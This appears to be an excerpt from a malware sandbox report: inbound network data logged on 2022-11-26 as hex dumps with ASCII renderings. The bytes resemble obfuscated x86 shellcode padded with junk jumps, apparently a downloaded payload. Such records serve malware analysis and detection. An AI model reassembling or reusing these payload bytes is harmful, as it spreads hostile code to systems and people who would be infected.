2022-11-26 10:17:50 UTC	176	IN	Data Raw: 57 7c 46 a4 e2 6e 76 50 76 42 01 eb 19 6f a1 9e 9b 07 da 5c ce 3a 80 5d 4f fb 65 5e 5f 75 83 de 98 25 2c ad cb 75 50 b8 9d 0b 00 00 b8 ce 4f 00 00 b8 36 7c 00 00 b8 78 44 00 00 58 51 b9 8f 70 00 00 b9 91 4b 00 00 59 eb 05 58 4c f8 ad 4d eb 0f b4 09 e3 73 50 b8 64 d2 f2 31 43 29 85 8c e4 90 eb 19 c0 fd 11 d8 19 86 3e f0 d9 10 63 14 59 47 31 d7 4a 9a be b9 97 22 cb b8 ed eb 05 e6 e5 98 c6 03 eb 05 89 aa f3 13 6e eb 0f 35 31 48 b3 8f b5 30 3b bb 7c c0 06 66 17 f5 eb 05 e6 c1 d6 ac 03 51 52 5a b9 94 4b 00 00 59 52 51 b9 88 56 00 00 eb 05 f7 32 b2 e3 53 eb 05 50 3f 43 7c b0 b9 25 48 00 00 90 b9 e8 2c 00 00 eb 0f c6 1e 29 fc 32 64 89 0a 3d 70 41 49 01 0a e0 52 5a eb 05 4c 3b 0c 49 68 eb 05 42 e0 a8 48 fe b9 a2 36 00 00 59 90 eb 0f 55 57 e4 69 5a 03 f5 d4 de 27 Data Ascii: W\|FnvPvBo\:]Oe^_u%,uPO6\|xDXQpKYXLMsPd1C)>cYG1J"n51H0;\|fQRZKYRQV2SP?C\|%H,)2d=pAIRZL;IhBH6YUWiZ'
2022-11-26 10:17:50 UTC	192	IN	Data Raw: b9 7e 7f 00 00 59 51 b9 17 15 00 00 59 50 b8 6a 08 00 00 eb 0f 66 fb 04 1f fc f6 d2 05 c0 83 b0 65 36 89 56 eb 19 47 34 d1 a0 0c 6b 6e 7b 4b e6 9a 73 31 2b 50 00 cc c3 a0 c0 31 43 92 e7 d0 51 b9 c2 19 00 00 52 5a 59 b8 cd 4c 00 00 58 52 ba 76 13 00 00 ba 8a 47 00 00 5a eb 0f d8 e5 f2 a9 9c 43 ce f5 e9 d0 79 5a 29 78 b7 eb 0f 09 21 ab 29 50 78 56 41 2f 9b 99 6b c1 a7 45 51 b9 f3 2f 00 00 eb 0f 86 78 fc 51 3e d3 a1 79 31 6b 75 a6 42 2d a1 59 eb 05 ed db 87 bb 60 51 59 eb 0f 81 d5 2e ce dc 7b 03 62 80 f8 5d b7 8e b7 8a 50 51 b9 59 5e 00 00 b9 2b 5a 00 00 59 b8 47 01 00 00 b8 04 5f 00 00 b8 0e 2a 00 00 b8 67 20 00 00 58 52 ba b0 40 00 00 5a 52 90 ba 0d 19 00 00 52 ba 8a 55 00 00 52 ba 0a 02 00 00 ba 3d 0c 00 00 ba b0 1f 00 00 ba c6 65 00 00 5a eb 0f 2b 79 b8 Data Ascii: ~YQYPjfe6VG4kn{Ks1+P1CQRZYLXRvGZCyZ)x!)PxVA/kEQ/xQ>y1kuB-Y`QY.{b]PQY^+ZYG_*g XR@ZRRUR=eZ+y
2022-11-26 10:17:50 UTC	208	IN	Data Raw: 03 00 00 59 59 51 51 b9 0e 24 00 00 59 b9 a2 5f 00 00 59 52 ba 3e 41 00 00 ba f4 68 00 00 5a 50 b8 6b 31 00 00 58 b9 69 49 00 00 50 eb 05 18 3c bf 57 45 50 b8 c2 60 00 00 b8 f3 16 00 00 58 58 eb 0f de 3a 2d 80 84 6c d5 1b 6c 8b 0f 5a 0e f0 92 eb 0f d4 34 a6 04 42 68 5c ab 43 7a 12 08 2b cb 2c eb 0f 45 85 0e 79 02 8b e1 40 22 a4 cf 5b 3d 46 14 50 eb 05 47 c1 f7 ab 98 52 5a eb 0f e4 9e 61 c1 b2 35 2d b3 ba ec 8f 98 96 1c 1a eb 19 dc 65 e4 50 88 dc 4e e7 61 10 40 f1 42 73 7a ca 1f 14 7e c6 54 99 56 16 77 eb 0f de ea 1a b7 10 2c 4d a3 a8 19 21 d4 7a 8d 71 eb 19 de b7 f1 dd d7 93 cf 16 6f ac d7 c0 43 16 ca c3 22 e0 4a 49 d5 3a 50 ed 46 eb 0f c0 00 64 4d b2 ca 70 38 69 74 d8 0f 4a 18 07 50 b8 0d 61 00 00 58 eb 05 aa 49 3e 89 ca eb 19 6f d8 93 a9 46 7a e4 85 61 Data Ascii: YYQQ$Y_YR>AhZPk1XiIP<WEP`XX:-llZ4Bh\Cz+,Ey@"[=FPGRZa5-ePNa@Bsz~TVw,M!zqoC"JI:PFdMp8itJPaXI>oFza
2022-11-26 10:17:50 UTC	224	IN	Data Raw: 7b 00 00 59 b8 3c 7c 00 00 58 5a 51 b9 a6 72 00 00 b9 45 03 00 00 59 50 b8 a5 08 00 00 58 eb 0f 08 21 56 d1 5f 4a 33 34 d6 39 89 c7 d2 66 f5 eb 19 aa f6 e8 b4 97 bb 30 d8 f7 23 aa bf 8e 5c f5 13 e8 a2 1d eb d8 a1 2e 7d d3 eb 19 7f 78 50 78 52 2f 56 f4 aa 9a a5 c0 c9 79 26 bf db 7b 14 0e 7d a5 b4 c8 2e 90 52 5a eb 0f 98 10 b6 a7 3d 73 08 01 05 90 d3 c6 5e 2a 35 90 eb 0f c8 f1 e8 e7 f1 aa 05 78 6c 8b 6a 70 6e 7f ad 51 59 52 ba d1 2d 00 00 5a eb 0f 53 8a 51 54 1f 86 0e 52 dc b2 f2 75 d7 fa 09 50 51 eb 05 b2 7c 77 70 47 eb 0f c1 37 3b 00 0d 47 40 71 58 08 76 c8 08 ec f8 eb 05 01 a8 db 9c c6 b9 6c 0b 00 00 b9 35 57 00 00 59 b8 9b 44 00 00 58 51 eb 19 4f 2e ab ef 16 f0 a6 e6 f9 73 6b 85 bd 5e dc 95 69 e2 f2 a9 97 35 39 a6 2b 52 5a b9 4c 3f 00 00 eb 0f 35 6c bf Data Ascii: {Y<\|XZQrEYPX!V_J349f0#\.}xPxR/Vy&{}.RZ=s^*5xljpnQYR-ZSQTRuPQ\|wpG7;G@qXvl5WYDXQO.sk^i59+RZL?5l
2022-11-26 10:17:50 UTC	240	IN	Data Raw: b8 9a 09 00 00 b8 d7 53 00 00 58 51 b9 72 3d 00 00 b9 ba 55 00 00 b9 ed 26 00 00 eb 19 f8 a6 55 74 5a e2 9e 30 fd e4 5e 80 e2 d6 0c bc a1 04 19 7a a5 11 0b 1a 2e eb 0f b5 3d f9 bf b1 61 2f 79 d8 0c 0a 8d d0 87 17 50 b8 3e 37 00 00 58 51 59 eb 19 9e 72 46 b3 df fa 69 4a 23 34 49 38 3e 8e 7c 21 c4 77 cd 2e 75 76 70 d2 e6 51 b9 10 4b 00 00 b9 e0 61 00 00 52 ba 0c 70 00 00 5a b9 72 15 00 00 b9 b1 67 00 00 59 eb 0f da fb 22 e1 d2 41 f0 b8 6f 64 97 e8 8d 7a e0 eb 19 19 f7 f7 03 aa ef 99 ad 5d ee b9 e2 bf eb 16 6e e1 3d 28 35 37 b1 fb 85 96 eb 05 0f 2f 58 cf 62 90 eb 05 12 39 db a4 e6 50 b8 23 4d 00 00 b8 e5 2b 00 00 eb 0f e0 a7 5f 8d bc 9f e7 36 10 09 dc 00 58 78 cc 50 b8 87 22 00 00 58 58 50 b8 a3 63 00 00 52 eb 0f 75 97 22 68 3f 67 1e d1 ac e9 26 b3 8e 4f 0e Data Ascii: SXQr=U&UtZ0^z.=a/yP>7XQYrFiJ#4I8>\|!w.uvpQKaRpZrgY"Aodz]n=(57/Xb9P#M+_6XxP"XXPcRu"h?g&O
2022-11-26 10:17:50 UTC	256	IN	Data Raw: 00 b9 56 56 00 00 b9 cd 24 00 00 59 5a eb 19 de 90 5a 1f 6e b5 97 a2 96 b2 48 07 00 78 d1 c0 cd 3a d3 37 46 87 ca 7a f1 ba c6 3e 00 00 5a 51 b9 88 04 00 00 b9 51 3b 00 00 59 51 b9 9b 4c 00 00 52 ba 02 42 00 00 ba 09 7d 00 00 eb 0f a0 56 3a 13 ef 84 fd e1 ee 0d 88 84 0a 63 a5 5a 59 52 ba 53 7a 00 00 5a 50 eb 0f 41 35 ab 0e 67 ed 88 92 80 a1 ae 4b a4 1d be 51 b9 7f 5e 00 00 eb 05 7a d3 c5 83 1b b9 5e 3f 00 00 b9 7a 13 00 00 b9 9c 1b 00 00 eb 0f 23 ca 15 36 2b 17 49 6b c8 07 3a 1e 77 53 65 52 ba 55 4e 00 00 5a 59 51 b9 97 46 00 00 50 58 b9 fe 47 00 00 eb 05 5a 8e 6c 3f 5a eb 05 43 92 05 89 7a eb 19 3a 06 9c c4 eb f2 90 c4 bb 37 99 23 c9 7c 17 b5 73 9d a5 bc 4f 9b 71 e4 61 eb 0f 8d 32 f2 e3 22 29 c4 c5 e4 c1 99 9f 4b 50 5d 59 58 eb 0f 69 6f 6e e6 76 f1 22 1f Data Ascii: VV$YZZnHx:7Fz>ZQQ;YQLRB}V:cZYRSzZPA5gKQ^z^?z#6+Ik:wSeRUNZYQFPXGZl?ZCz:7#\|sOqa2")KP]YXionv"
2022-11-26 10:17:51 UTC	272	IN	Data Raw: 17 6a 31 51 b3 89 e5 a8 dd 07 9f 50 1a 27 d3 f8 eb 04 cd ca 46 0e 16 76 51 b9 c0 70 00 00 59 52 ba bc 7e 00 00 5a b9 ea 04 00 00 b9 fd 68 00 00 b9 ca 6f 00 00 b9 b8 29 00 00 50 58 59 51 b9 f7 52 00 00 51 b9 bc 66 00 00 59 51 90 b9 78 70 00 00 90 b9 d8 17 00 00 b9 12 72 00 00 eb 0f d5 39 a0 c0 c2 fe 50 3c 65 f7 56 c8 e4 5f 34 eb 19 58 01 84 54 49 b8 2b 65 c2 36 00 8c c1 ad d1 d6 07 dc 2c 8e 99 be c2 a3 69 90 b9 80 4a 00 00 50 b8 04 71 00 00 51 59 b8 c9 34 00 00 58 90 59 59 59 51 b9 e2 7f 00 00 59 51 b9 fd 18 00 00 59 51 b9 85 3e 00 00 b9 c6 23 00 00 50 b8 b0 2d 00 00 58 59 90 51 b9 56 23 00 00 59 50 58 51 59 56 51 b9 b0 2e 00 00 b9 8b 2f 00 00 b9 1d 1d 00 00 b9 cc 09 00 00 59 51 eb 0f ea 63 65 2a cc 1c 1d 72 2d 08 69 2d 29 d7 fe 90 eb 05 e7 5a 93 67 04 52 Data Ascii: j1QP'FvQpYR~Zho)PXYQRQfYQxpr9P<eV_4XTI+e6,iJPqQY4XYYYQYQYQ>#P-XYQV#YPXQYVQ./YQce*r-i-)ZgR
2022-11-26 10:17:51 UTC	288	IN	Data Raw: ea 8f 83 51 b9 20 2a 00 00 59 51 b9 da 2a 00 00 b9 fe 22 00 00 59 90 ba 18 53 00 00 5a 51 b9 08 06 00 00 59 51 b9 ee 07 00 00 b9 48 19 00 00 b9 aa 18 00 00 b9 f5 0e 00 00 59 eb 19 c3 1a f6 41 5f df 51 ec 3b 5f d4 c3 c8 11 d4 d3 f0 9c 64 1b 03 ba ea f6 b8 51 b9 ee 48 00 00 50 b8 7f 55 00 00 58 eb 19 6c 19 03 5c 13 e5 48 d5 c6 ec ba 3a d1 0d 56 1d de 37 a7 51 f1 89 29 e0 22 52 ba de 65 00 00 50 b8 88 3a 00 00 b8 ec 5f 00 00 b8 38 72 00 00 b8 5f 52 00 00 eb 19 a9 cc 87 37 c3 09 63 fb 48 db d3 3a 63 64 38 71 db f3 ab 9e fb 77 00 38 61 58 ba cc 4a 00 00 5a eb 0f f7 d6 bf 26 f6 37 13 f8 34 6f 56 cd 29 ac b7 51 b9 a0 72 00 00 59 eb 19 4d c0 4d c7 00 a7 6b 0d aa 2c f3 dd c1 11 46 72 91 e9 53 39 e7 cb 8c d3 a3 eb 0f eb 91 80 83 75 90 2d 84 6a 8d 50 f1 38 3a 93 51 Data Ascii: Q YQ"YSZQYQHYA_Q;_dQHPUXl\H:V7Q)"ReP:_8r_R7cH:cd8qw8aXJZ&74oV)QrYMMk,FrS9u-jP8:Q
2022-11-26 10:17:51 UTC	304	IN	Data Raw: eb 19 49 4d 2e 46 e9 9f b4 d3 ab 10 8a bd d9 ca b9 58 82 74 f4 91 ed 73 90 93 45 51 51 b9 3d 2f 00 00 59 59 51 eb 19 08 03 e1 0d 6d 50 28 81 f6 14 d3 29 13 ae fa 09 1d fa ed 95 b8 3e 11 a3 60 eb 19 68 b2 dc 45 22 34 bd 9b 29 64 fc da f4 62 61 08 b5 f0 0d 16 05 fd 69 b4 63 eb 19 11 5e 61 54 b8 1c af 91 2a 19 5c cf a7 a9 12 5d 8d dc f8 7a d9 8e a0 a6 8d eb 0f d7 92 ac 6b 16 22 0a 81 3f 56 66 e3 65 75 a6 eb 19 e3 45 1f 05 86 d3 0c 37 67 53 0c 7e 61 cf ad 85 f4 fa b3 52 42 7f ab 4b f9 52 ba 97 5d 00 00 ba 0e 2a 00 00 52 ba f2 2b 00 00 ba 3f 7b 00 00 5a 90 5a 52 eb 0f 06 2d f6 47 51 85 19 4c 4f 90 e4 dd b3 25 6a 51 b9 59 03 00 00 b9 2d 26 00 00 b9 ed 53 00 00 b9 69 49 00 00 59 ba 3e 5f 00 00 5a 51 90 b9 c2 0b 00 00 59 b9 d4 69 00 00 59 51 b9 de 6f 00 00 b9 5a Data Ascii: IM.FXtsEQQ=/YYQmP()>`hE"4)dbaic^aT\]zk"?VfeuE7gS~aRBKR]R+?{ZZR-GQLO%jQY-&SiIY>_ZQYiYQoZ
2022-11-26 10:17:51 UTC	320	IN	Data Raw: 90 51 b9 f5 2e 00 00 b9 5a 57 00 00 b9 07 55 00 00 b9 99 67 00 00 59 52 ba 0c 72 00 00 ba b4 34 00 00 ba 12 2e 00 00 ba 36 05 00 00 5a 50 b8 e9 09 00 00 58 eb 19 0e 48 f2 14 c6 7c 66 14 e7 98 5e c3 80 fa a2 0d 59 3e 8c 79 0a e5 e4 d6 d3 eb 0f 67 1e 1b 43 d2 40 92 2e 1b 50 2d 7e 51 9f 79 50 b8 90 5b 00 00 b8 3e 02 00 00 58 58 b8 ff 09 00 00 58 b9 d4 2a 00 00 b9 b9 1d 00 00 b9 f7 34 00 00 b9 28 60 00 00 59 eb 19 bc 11 7a bc c5 60 ac 16 e5 66 be 65 f1 3e 3b 2c fa 05 8e 20 27 3d 8a 42 7d 51 b9 8d 0d 00 00 59 51 b9 36 42 00 00 59 eb 05 2a 1c dd c9 2c 52 ba 2b 25 00 00 5a 51 51 b9 57 38 00 00 50 b8 c0 09 00 00 58 59 eb 0f 64 2a a9 dd cb fb 76 ca 39 3c d9 d2 b3 e7 54 eb 05 cf d4 2a a9 4b 52 ba eb 5b 00 00 ba 3d 30 00 00 ba 4c 55 00 00 ba 69 1f 00 00 5a b9 ff 23 Data Ascii: Q.ZWUgYRr4.6ZPXH\|f^Y>ygC@.P-~QyP[>XXX4(`Yz`fe>;, '=B}QYQ6BY,R+%ZQQW8PXYdv9<TKR[=0LUiZ#
2022-11-26 10:17:51 UTC	336	IN	Data Raw: 5f e4 83 3f c0 22 2b 30 87 b0 fd 24 b9 d9 a4 90 eb 05 2d cb 07 85 a2 59 b9 c2 64 00 00 59 eb 0f 71 00 46 72 3a 90 b5 46 99 8f 88 5c 36 4e b5 52 5a 50 b8 8f 52 00 00 b8 72 08 00 00 b8 5e 57 00 00 b8 9f 24 00 00 58 eb 0f 32 d7 ee 1b 00 85 f5 2a f9 6a a6 22 f6 c7 1b eb 0f 49 e0 9f c2 c0 4c 37 d7 3d a3 ed 72 19 c0 66 51 b9 c0 7b 00 00 b9 eb 44 00 00 59 eb 05 83 74 de b8 b0 eb 19 ec a7 09 de e0 5e a6 ed 93 2a 6e cd 7c a7 0f 6f 7d af 37 a4 f7 1f f0 68 9d eb 19 b7 b3 d6 4c 66 35 a3 0a bc 92 69 df 57 53 c2 b8 25 f7 66 3d 46 d5 6d 11 40 eb 0f 2c 8e c2 1f 5c 88 93 75 46 2f a9 0e 1f 1b 3e eb 19 90 ee 57 c5 70 4e 7b 26 4c fe 7f 1b 62 0f 29 21 3a 66 c5 c2 95 33 dd 39 c1 90 eb 19 7f f3 43 9f b3 4c 29 93 ac 8d de d5 b6 f0 7c de f0 f5 78 a4 d2 dc a1 1c 11 51 b9 de 42 00 Data Ascii: _?"+0$-YdYqFr:F\6NRZPRr^W$X2j"IL7=rfQ{DYt^n\|o}7hLf5iWS%f=Fm@,\uF/>WpN{&Lb)!:f39CL)\|xQB
2022-11-26 10:17:51 UTC	352	IN	Data Raw: bf 2d 00 00 b8 40 36 00 00 90 58 eb 05 35 7d 56 f9 69 50 b8 4d 6f 00 00 b8 0f 5d 00 00 b8 46 44 00 00 b8 df 72 00 00 58 90 eb 0f dc 40 7d 0a ae a3 06 1c 70 ab b5 a6 fd b8 ab eb 0f 61 17 02 96 bf eb d5 ad 85 8e aa 9f 1f 10 10 50 b8 44 2c 00 00 58 eb 0f b1 1a be 06 e1 53 88 73 b5 91 35 02 80 a9 be 51 b9 43 1a 00 00 b9 58 67 00 00 59 eb 19 fe 9b 62 2d 82 6e e1 24 7d 9c bc 9d c0 f1 45 5e 89 3e fe d2 b0 bb 3e 0e b9 50 58 eb 0f 18 bd d0 2e 1b 54 72 16 27 cf af 66 51 0d 10 eb 19 44 d5 e4 af 68 13 db 74 db 49 bd d9 d4 5f f9 51 21 10 05 52 24 dd ab 67 1b 52 5a 52 ba 14 3a 00 00 90 ba bd 42 00 00 5a eb 0f 77 58 c3 e9 26 44 61 2f b0 b9 6e 5a 2c 56 5e 51 b9 f5 57 00 00 b9 c1 26 00 00 b9 ef 63 00 00 b9 37 7b 00 00 59 51 b9 c8 3b 00 00 50 b8 1a 76 00 00 58 b9 13 00 00 Data Ascii: -@6X5}ViPMo]FDrX@}paPD,XSs5QCXgYb-n$}E^>>PX.Tr'fQDhtI_Q!R$gRZR:BZwX&Da/nZ,V^QW&c7{YQ;PvX
2022-11-26 10:17:51 UTC	368	IN	Data Raw: 00 00 5a 59 b8 fe 30 00 00 50 b8 af 0f 00 00 b8 27 2c 00 00 58 b8 46 2f 00 00 52 ba 2d 11 00 00 eb 0f df b3 cd bb 7e 52 c9 56 fb 96 e1 14 a8 0e 10 50 b8 cd 03 00 00 58 ba 78 65 00 00 90 ba 64 3d 00 00 51 b9 00 3b 00 00 b9 13 21 00 00 eb 05 46 3b e7 3d c5 50 b8 ad 1d 00 00 b8 91 19 00 00 58 52 ba 79 66 00 00 52 ba 37 6f 00 00 52 ba 14 31 00 00 ba 55 21 00 00 ba 46 6a 00 00 ba ed 7f 00 00 5a 5a 5a 90 51 b9 2c 3b 00 00 b9 4f 10 00 00 59 b9 22 00 00 00 b9 9e 22 00 00 51 b9 6e 0c 00 00 59 59 90 51 b9 10 6b 00 00 59 ba ff 0c 00 00 5a 58 90 eb 05 3b 78 fa 8e 93 eb 05 51 1b 3c 52 f6 50 b8 e3 71 00 00 b8 da 42 00 00 52 ba 8e 3d 00 00 ba 52 40 00 00 5a 58 eb 05 d2 1e 0b 21 4e eb 0f 8f 81 7a 62 88 4e f6 96 0d f4 26 bf b0 25 55 eb 0f 0e 86 9c 6a 63 2a dd ab 45 a9 f0 Data Ascii: ZY0P',XF/R-~RVPXxed=Q;!F;=PXRyfR7oR1U!FjZZZQ,;OY""QnYYQkYZX;xQ<RPqBR=R@ZX!NzbN&%Ujc*E
2022-11-26 10:17:51 UTC	384	IN	Data Raw: 00 00 ba e1 6d 00 00 5a eb 05 34 f1 a2 cb 9b eb 0f 99 37 ef 98 cf 61 ee 3a f5 36 9d f2 95 8b 25 5a eb 0f 50 ba 23 e6 b6 7e 6e 72 83 f5 81 7e 0b 2e ec eb 0f a5 e2 19 35 5d 92 0d 57 8a c1 b3 af 38 96 ea 51 b9 c2 1f 00 00 59 52 51 b9 e0 70 00 00 59 eb 0f 39 fb ca 50 6e 5d 7b e0 75 bb 57 c5 b3 5c 6c ba e5 55 00 00 5a 50 90 eb 0f 0a e4 2e f0 74 7e 5c 3d b4 65 c9 6d f3 40 88 eb 19 50 d1 30 2b d2 7a e3 96 d1 f4 8c 51 83 0d 06 f5 1d 2b f5 e9 79 47 5d 2f dd 51 59 50 58 eb 05 73 6a 66 08 a1 52 ba bd 3d 00 00 5a 58 90 51 b9 0b 24 00 00 59 51 eb 0f b0 d2 76 e9 1e 3b 37 96 51 08 9b 1f 7b 1b fa 59 50 eb 0f 0f 73 57 6c 13 37 ed a2 2d 51 60 7f 55 b4 9e b8 c0 7d 00 00 50 b8 0e 5a 00 00 58 eb 0f 97 83 77 fa 55 0a 3c 80 2f f4 5d 81 df 9b 48 eb 0f 3d 1f 41 c3 70 de 2f 2e 20 Data Ascii: mZ47a:6%ZP#~nr~.5]W8QYRQpY9Pn]{uW\lUZP.t~\=em@P0+zQ+yG]/QYPXsjfR=ZXQ$YQv;7Q{YPsWl7-Q`U}PZXwU</]H=Ap/.
2022-11-26 10:17:51 UTC	400	IN	Data Raw: 71 00 eb 0f 5c f6 cd 6b c5 14 3a b0 bd b2 37 7a ac 09 b7 50 b8 e8 7f 00 00 58 50 b8 a1 19 00 00 b8 d5 4c 00 00 58 eb 19 c0 84 fe 69 5e ed c0 0a d4 f1 55 74 f2 0f 9d 0d 93 d5 79 b5 73 42 97 92 e2 eb 0f d4 2d 0e 4f 6a e9 57 f6 5b 02 fc 67 9d fb 74 52 ba dd 50 00 00 5a 52 ba 1a 79 00 00 5a eb 19 e5 ab 2a 10 d7 16 87 55 a0 a2 25 21 06 f5 b9 69 78 70 5b 21 cb ad 71 97 4f 90 eb 0f 85 2b 6e 3f 11 70 29 27 16 89 6a 46 29 c3 d0 90 eb 19 e4 6a 26 10 b6 e5 69 8e ca fb 28 f4 d3 cc 22 f5 0c e0 e4 51 7d f1 e8 4b 01 eb 19 59 16 83 5e c2 60 f6 ea 57 d5 0b 3b 32 ac 82 6d 43 d8 2b 4f 00 9b 52 de 77 90 eb 05 96 66 fa 7f 59 90 52 ba 43 0f 00 00 ba a5 09 00 00 51 51 90 b9 c0 23 00 00 59 b9 30 22 00 00 59 5a 51 59 eb 0f 00 d2 2b 8a 89 ba 5c e7 22 04 b0 5d 79 ca 93 50 b8 b0 3b Data Ascii: q\k:7zPXPLXi^UtysB-OjW[gtRPZRyZ*U%!ixp[!qO+n?p)'jF)j&i("Q}KY^`W;2mC+ORwfYRCQQ#Y0"YZQY+\"]yP;
2022-11-26 10:17:51 UTC	416	IN	Data Raw: 47 9e 72 eb 86 49 8d b8 f5 23 8a b1 db eb 0f a3 52 a8 18 9d c2 5b 92 20 bb bb fb c8 4f 13 59 90 51 90 59 51 b9 b9 71 00 00 eb 19 f8 d9 e7 ed 6d 4f 0b 80 ad 72 54 8d 0b bf 81 69 3a bb 70 7f e7 8e 32 a2 7d 90 51 b9 14 6d 00 00 b9 3e 01 00 00 b9 88 11 00 00 b9 07 54 00 00 59 50 eb 0f fb d4 30 b4 4f 2e 83 16 59 34 4f f0 b0 e2 55 51 b9 06 1b 00 00 b9 b7 34 00 00 b9 f1 12 00 00 b9 33 1c 00 00 59 51 b9 17 44 00 00 59 58 51 50 58 b9 af 53 00 00 eb 0f c7 e5 a4 22 14 25 30 55 72 5a 3d 0b 48 16 8f eb 0f fe 1f b0 66 cf de 90 12 fa c5 49 e6 36 33 9e 52 51 59 ba 21 4e 00 00 ba 39 26 00 00 ba 34 01 00 00 ba 14 32 00 00 5a 59 eb 0f 5a 2a 4a 95 61 6a c9 03 ca f6 b2 ca 4b 2b c4 eb 0f 54 09 7e 11 17 ee d7 67 d3 ad 9d e8 d1 5b 9a 90 eb 05 f6 4c 62 f5 6c 52 ba df 75 00 00 ba Data Ascii: GrI#R[ OYQYQqmOrTi:p2}Qm>TYP0O.Y4OUQ43YQDYXQPXS"%0UrZ=HfI63RQY!N9&42ZYZ*JajK+T~g[LblRu
2022-11-26 10:17:51 UTC	432	IN	Data Raw: d0 27 00 00 eb 0f 59 76 de 85 bb 41 be fd bc b4 70 f6 80 69 d3 eb 19 c5 93 b6 9b 6c e2 37 a4 50 42 5c e6 a3 a8 ef dd c5 b4 e6 88 aa ef 3e 51 03 5a eb 19 d7 b8 96 e9 3c d3 2e be 0c f2 76 94 80 01 82 6a dc ae 78 7f 7d a0 39 28 db 50 b8 cd 69 00 00 58 52 5a 90 ba 26 0a 00 00 ba 1d 1a 00 00 ba 96 59 00 00 ba b0 48 00 00 5a ba a4 25 00 00 ba 8e 4b 00 00 52 ba 10 27 00 00 ba 7c 23 00 00 5a ba fc 69 00 00 eb 0f 83 4d 20 ca a7 75 02 24 98 af 4b 2d 4b ee 3d 50 50 b8 ff 1c 00 00 58 90 58 50 b8 c7 38 00 00 51 59 eb 0f 13 52 b3 ec dc 4d 7a c6 8f 00 be 26 01 d4 fd 50 b8 20 3b 00 00 58 eb 0f f1 85 10 8a e6 b6 a4 7f ee 10 1c f2 3f 8b 5a 50 eb 05 25 62 ec b3 f6 b8 8a 72 00 00 51 b9 7d 50 00 00 b9 56 1a 00 00 b9 dc 60 00 00 b9 f9 14 00 00 59 58 50 eb 05 35 eb a9 a7 74 b8 Data Ascii: 'YvApil7PB\>QZ<.vjx}9(PiXRZ&YHZ%KR'\|#ZiM u$K-K=PPXXP8QYRMz&P ;X?ZP%brQ}PV`YXP5t
2022-11-26 10:17:51 UTC	448	IN	Data Raw: 7d 34 00 00 ba 79 73 00 00 5a 51 59 90 eb 19 41 d7 a2 7c 2b 25 95 ce 75 70 9a 87 a8 de 0c af 4f 2f 36 a0 21 5c 1c b7 14 90 50 b8 eb 76 00 00 58 51 b9 d7 5a 00 00 b9 72 45 00 00 50 b8 f4 06 00 00 b8 4e 2d 00 00 b8 91 20 00 00 b8 ae 39 00 00 58 b9 27 50 00 00 b9 ad 66 00 00 59 5d c3 52 5a 52 ba 6c 30 00 00 5a eb 0f 80 4e 4c df bc ae 98 a6 7f 86 54 e7 0a c0 e4 eb 0f fb 8f d4 e3 a3 8e 01 bc 63 5e 99 a8 a9 f9 50 eb 0f ab a3 9e 96 18 70 4b 35 4d 60 2c d7 a6 e2 a9 50 51 b9 86 10 00 00 59 58 52 50 b8 b5 78 00 00 b8 94 73 00 00 b8 74 2a 00 00 b8 f3 3f 00 00 58 50 b8 31 0e 00 00 b8 cb 59 00 00 58 50 b8 17 77 00 00 b8 df 27 00 00 51 b9 a8 76 00 00 59 52 50 b8 dd 59 00 00 b8 54 0f 00 00 b8 30 7c 00 00 b8 47 5b 00 00 58 5a eb 0f 97 be 90 35 f9 25 d7 5c 2b aa eb eb 03 Data Ascii: }4ysZQYA\|+%upO/6!\PvXQZrEPN- 9X'PfY]RZRl0ZNLTc^PpK5M`,PQYXRPxst*?XP1YXPw'QvYRPYT0\|G[XZ5%\+
2022-11-26 10:17:51 UTC	464	IN	Data Raw: 00 00 b9 04 6e 00 00 59 90 50 58 51 b9 46 1d 00 00 59 eb 0f 81 e0 69 9b 6f ef da 32 d3 92 f2 aa e0 46 4f eb 0f 71 c4 d3 62 83 0f c1 25 94 01 b9 c8 bd dd 11 eb 0f c8 b5 b5 87 23 94 a2 68 be 3b 6e 68 79 aa 05 51 59 52 ba 04 5e 00 00 5a eb 05 32 68 a4 b9 e7 eb 0f 45 1c 03 a9 86 b0 1c 17 77 8a a7 af 51 28 86 90 eb 0f 85 23 87 e0 5c a3 96 02 60 71 a5 cd 27 3f 01 55 eb 05 4c ad fd 74 d0 eb 0f fa a0 c6 61 fc ed 8b 5a 73 b4 34 7f ec f4 dd 51 b9 9c 01 00 00 b9 b1 28 00 00 b9 1c 22 00 00 b9 4b 5a 00 00 52 ba e7 39 00 00 5a eb 0f 12 cf 57 d1 3b 89 be 3b 6a ec 33 73 37 a5 f4 59 90 89 e5 8b 45 08 eb 19 6f fb 64 60 e8 08 2e 21 3c e0 43 bb 4a 08 55 31 74 4f d6 51 d1 4e b1 69 d4 52 5a eb 0f 5d 27 97 c3 f9 d7 a1 64 ac f8 7e 08 22 7c 14 52 5a eb 0f 00 65 e4 7c c2 8d a0 3f Data Ascii: nYPXQFYio2FOqb%#h;nhyQYR^Z2hEwQ(#\`q'?ULtaZs4Q("KZR9ZW;;j3s7YEod`.!<CJU1tOQNiRZ]'d~"\|RZe\|?
2022-11-26 10:17:51 UTC	480	IN	Data Raw: b4 3d 52 ba 89 4b 00 00 ba 93 04 00 00 5a eb 0f 1d d1 2b 99 7b 89 eb d7 31 f4 49 22 1f e9 cf 90 51 eb 0f e6 3b 38 b6 05 ee 2d 68 07 cf b5 6e 21 d3 95 b9 22 18 00 00 b9 c1 66 00 00 59 b9 0e 04 00 00 59 52 5a eb 05 e3 52 0e eb 66 eb 19 22 50 fb 70 05 08 2d 50 8e 7a f0 e3 74 4e dd 99 9a f9 97 a5 42 23 6a 0d b6 52 ba 8f 73 00 00 ba b8 2f 00 00 50 b8 fb 77 00 00 b8 3d 28 00 00 b8 ac 06 00 00 b8 c1 60 00 00 52 ba 01 46 00 00 ba cb 1c 00 00 5a 58 eb 0f b4 dd a0 b4 a9 20 71 d6 15 4a eb c7 47 64 22 51 b9 d1 11 00 00 59 5a 90 52 5a b9 ee 43 00 00 59 5a 55 eb 05 dc cc 06 ae 29 52 ba 94 79 00 00 5a eb 05 83 8e 26 a6 90 50 51 b9 41 75 00 00 b9 90 4c 00 00 b9 2e 31 00 00 b9 f5 35 00 00 52 ba 60 49 00 00 ba 34 25 00 00 eb 19 9b 6f 7e 9e a0 0f 35 16 0d dc 4f 03 73 7d 0c Data Ascii: =RKZ+{1I"Q;8-hn!"fYYRZRf"Pp-PztNB#jRs/Pw=(`RFZX qJGd"QYZRZCYZU)RyZ&PQAuL.15R`I4%o~5Os}
